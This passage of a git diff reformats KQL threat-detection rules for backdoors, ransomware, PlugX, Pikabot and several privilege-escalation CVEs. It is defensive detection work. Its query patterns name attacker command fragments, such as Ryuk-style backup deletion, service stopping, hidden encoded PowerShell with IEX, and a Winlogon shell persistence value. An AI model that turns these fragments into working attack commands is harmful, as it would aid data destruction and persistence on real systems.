tunnel for C2 as described in the trustwave report -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Pingback Backdoor Activity +// Author: Bhabesh Raj +// Date: 2021-05-05 +// Level: high +// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "config" and ProcessCommandLine contains "msdtc" and ProcessCommandLine contains "start" and ProcessCommandLine contains "auto") and InitiatingProcessFolderPath endswith "\\updata.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql index 8d1491ae..59429104 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql @@ -1,12 +1,12 @@ -// Title: Pingback Backdoor DLL Loading Activity -// Author: Bhabesh Raj -// Date: 2021-05-05 -// Level: high -// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Pingback Backdoor DLL Loading Activity +// Author: Bhabesh Raj +// Date: 2021-05-05 +// Level: high +// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath =~ "C:\\Windows\\oci.dll" and InitiatingProcessFolderPath endswith "\\msdtc.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql index 5a037b2f..5a1d7091 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql @@ -1,12 +1,12 @@ -// Title: Pingback Backdoor File Indicators -// Author: Bhabesh Raj -// Date: 2021-05-05 -// Level: high -// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Pingback Backdoor File Indicators +// Author: Bhabesh Raj +// Date: 2021-05-05 +// Level: high +// Description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "updata.exe" and FolderPath =~ "C:\\Windows\\oci.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql index 1f97923c..daa38ffa 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential ACTINIUM Persistence Activity -// Author: Andreas Hunkeler (@Karneades) -// Date: 2022-02-07 -// Level: high -// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential ACTINIUM Persistence Activity +// Author: Andreas Hunkeler (@Karneades) +// Date: 2022-02-07 +// Level: high +// Description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "create" and ProcessCommandLine contains "wscript" and ProcessCommandLine contains " /e:vbscript" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql index a65a97a6..f9fc009f 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2021-41379 Exploitation Attempt -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-22 -// Level: critical -// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential CVE-2021-41379 Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\elevation_service.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql index e4dfdf8c..8dc33cc3 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2023-21554 QueueJumper Exploitation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-12 -// Level: high -// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential CVE-2023-21554 QueueJumper Exploitation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-12 +// Level: high +// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\Windows\\System32\\mqsvc.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql index fb0d5662..faeeae87 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential CVE-2024-35250 Exploitation Activity -// Author: @eyezuhk Isaac Fernandes -// Date: 2025-02-19 -// Level: medium -// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats -// False Positives: -// - Legitimate applications that use Windows Stream Interface APIs. -// - Media applications that use DirectShow filters. - -DeviceImageLoadEvents +// Title: Potential CVE-2024-35250 Exploitation Activity +// Author: @eyezuhk Isaac Fernandes +// Date: 2025-02-19 +// Level: medium +// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats +// False Positives: +// - Legitimate applications that use Windows Stream Interface APIs. +// - Media applications that use DirectShow filters. + +DeviceImageLoadEvents | where FolderPath endswith "\\ksproxy.ax" and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\app-" and InitiatingProcessFolderPath contains "\\Discord.exe") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Opera\\opera.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql index 195a4faf..b2da971c 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql @@ -1,12 +1,12 @@ -// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) -// Author: Nisarg Suthar -// Date: 2025-08-01 -// Level: high -// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats -// False Positives: -// - Legitimate administrative command execution - -DeviceProcessEvents +// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) +// Author: Nisarg Suthar +// Date: 2025-08-01 +// Level: high +// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats +// False Positives: +// - Legitimate administrative command execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\crushftp.exe" and (((ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe") and FolderPath endswith "\\cmd.exe") or (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql index da562f22..768174f9 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql @@ -1,12 +1,12 @@ -// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior -// Date: 2024-03-22 -// Level: high -// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior +// Date: 2024-03-22 +// Level: high +// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData contains "-nop -w h" and RegistryValueData contains "$env" and RegistryValueData contains "explorer.exe" and RegistryValueData contains "Start-Process") and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql index 793e6168..4e73f2f9 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential Pikabot Hollowing Activity -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-10-27 -// Level: high -// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. -// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Pikabot Hollowing Activity +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-27 +// Level: high +// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. +// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\sndvol.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wwahost.exe") and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not((FolderPath endswith "\\sndvol.exe" and InitiatingProcessCommandLine contains "mmsys.cpl"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql index ae3bceec..ffe1c480 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql @@ -1,10 +1,10 @@ -// Title: Potential PlugX Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2017-06-12 -// Level: high -// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential PlugX Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-12 +// Level: high +// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath endswith "\\CamMute.exe" and (not((FolderPath contains "\\Lenovo\\Communication Utility\\" or FolderPath contains "\\Lenovo\\Communications Utility\\")))) or (FolderPath endswith "\\chrome_frame_helper.exe" and (not(FolderPath contains "\\Google\\Chrome\\application\\"))) or (FolderPath endswith "\\dvcemumanager.exe" and (not(FolderPath contains "\\Microsoft Device Emulator\\"))) or (FolderPath endswith "\\Gadget.exe" and (not(FolderPath contains "\\Windows Media Player\\"))) or (FolderPath endswith "\\hcc.exe" and (not(FolderPath contains "\\HTML Help Workshop\\"))) or (FolderPath endswith "\\hkcmd.exe" and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysNative\\" or FolderPath contains "\\SysWow64\\")))) or (FolderPath endswith "\\Mc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit")))) or (FolderPath endswith "\\MsMpEng.exe" and (not((FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Windows Defender\\" or FolderPath contains "\\AntiMalware\\")))) or (FolderPath endswith "\\msseces.exe" and (not((FolderPath contains "\\Microsoft Security Center\\" or FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Microsoft Security Essentials\\")))) or (FolderPath endswith "\\OInfoP11.exe" and (not(FolderPath contains "\\Common Files\\Microsoft Shared\\"))) or (FolderPath endswith "\\OleView.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\")))) or (FolderPath endswith "\\rc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\" or FolderPath contains "\\Microsoft.NET\\")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql index 71a90158..35534de5 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Ryuk Ransomware Activity -// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-12-16 -// Level: high -// Description: Detects Ryuk ransomware activity -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Ryuk Ransomware Activity +// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-12-16 +// Level: high +// Description: Detects Ryuk ransomware activity +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "del /s /f /q c:\\" and ProcessCommandLine contains "*.bac" and ProcessCommandLine contains "*.bak" and ProcessCommandLine contains "*.bkf") or ((ProcessCommandLine contains "samss" or ProcessCommandLine contains "audioendpointbuilder" or ProcessCommandLine contains "unistoresvc_" or ProcessCommandLine contains "AcrSch2Svc") and (ProcessCommandLine contains " stop " and ProcessCommandLine contains " /y") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "C:\\users\\Public\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql index d3d57bb1..34e1b597 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql @@ -1,10 +1,10 @@ -// Title: Potential SystemNightmare Exploitation Attempt -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-11 -// Level: critical -// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential SystemNightmare Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-11 +// Level: critical +// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "printnightmare.gentilkiwi.com" or ProcessCommandLine contains " /user:gentilguest " or ProcessCommandLine contains "Kiwi Legit Printer" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql index 147394fd..52444c1c 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql @@ -1,14 +1,14 @@ -// Title: Serpent Backdoor Payload Execution Via Scheduled Task -// Author: @kostastsale -// Date: 2022-03-21 -// Level: high -// Description: Detects post exploitation execution technique of the Serpent backdoor. -// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. -// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Serpent Backdoor Payload Execution Via Scheduled Task +// Author: @kostastsale +// Date: 2022-03-21 +// Level: high +// Description: Detects post exploitation execution technique of the Serpent backdoor. +// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. +// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "[System/EventID=" and ProcessCommandLine contains "/create" and ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/ec" and ProcessCommandLine contains "/so" and ProcessCommandLine contains "/tn run") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql index 35978f87..8c269693 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql @@ -1,12 +1,12 @@ -// Title: Small Sieve Malware CommandLine Indicator -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-19 -// Level: high -// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Small Sieve Malware CommandLine Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: high +// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine endswith ".exe Platypus" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql index 9b20865f..d9d5c139 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Sysmon as Execution Parent -// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault) -// Date: 2022-11-10 -// Level: high -// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats - -DeviceProcessEvents +// Title: Suspicious Sysmon as Execution Parent +// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault) +// Date: 2022-11-10 +// Level: high +// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\Sysmon.exe" or InitiatingProcessFolderPath endswith "\\Sysmon64.exe") and (not(((FolderPath contains ":\\Windows\\Sysmon.exe" or FolderPath contains ":\\Windows\\Sysmon64.exe" or FolderPath contains ":\\Windows\\System32\\conhost.exe" or FolderPath contains ":\\Windows\\System32\\WerFault.exe" or FolderPath contains ":\\Windows\\System32\\WerFaultSecure.exe" or FolderPath contains ":\\Windows\\System32\\wevtutil.exe" or FolderPath contains ":\\Windows\\SysWOW64\\wevtutil.exe") or isnull(FolderPath) or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql index 1d44572a..b0d8a9b3 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql @@ -1,10 +1,10 @@ -// Title: Suspicious VBScript UN2452 Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-05 -// Level: high -// Description: Detects suspicious inline VBScript keywords as used by UNC2452 -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats - -DeviceProcessEvents +// Title: Suspicious VBScript UN2452 Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious inline VBScript keywords as used by UNC2452 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "Execute" and ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" and ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion") and (not(ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql index e342028a..161f5906 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql @@ -1,10 +1,10 @@ -// Title: TAIDOOR RAT DLL Load -// Author: Florian Roth (Nextron Systems) -// Date: 2020-07-30 -// Level: high -// Description: Detects specific 